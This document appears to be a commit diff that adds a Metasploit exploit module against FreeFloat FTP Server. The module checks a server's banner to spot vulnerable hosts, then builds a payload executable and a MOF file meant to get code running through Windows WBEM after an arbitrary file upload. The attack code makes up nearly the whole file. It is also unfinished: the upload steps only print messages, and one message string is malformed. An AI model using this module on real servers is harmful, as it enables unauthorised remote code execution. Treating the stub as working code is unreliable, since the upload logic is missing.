I would do anything for a cake.

Author: sinn3r

modules/exploits/windows/ftp/freefloatftp_wbem.rb

@@ -0,0 +1,74 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Ftp
+	include Msf::Exploit::WbemExec
+	include Msf::Exploit::EXE
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "FreeFloat FTP Server Arbitrary File Upload",
+			'Description'    => %q{
+				Scre buffer overflows. FreeFloat allows remote user to upload anywhere on the file system.  Win!
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'juan vazquez',
+					'sinn3r'
+				],
+			'References'     =>
+				[
+					['URL', 'http://metasploit.com']
+				],
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['FreeFloat', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Apr 1 2012",
+			'DefaultTarget'  => 0))
+	end
+
+	def check
+		connect
+		disconnect
+
+		if banner =~ /FreeFloat/
+			# Yup, you're f*cked
+			return Exploit::CheckCode::Vulnerable
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+	def exploit
+		print_status("#{peer} - Generating payload...")
+		exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
+		exe      = generate_payload_exe
+		mof_name = Rex::Text::rand_text_alpha(5) + ".mof"
+		mof      = generate_mof(mof_name, exe_name)
+
+		connect
+
+		print_status("#{peer} - Uploading '{exe_name}'")
+
+		print_status("#{peer} - Uploading '#{mof_name}'")
+
+		disconnect
+	end
+end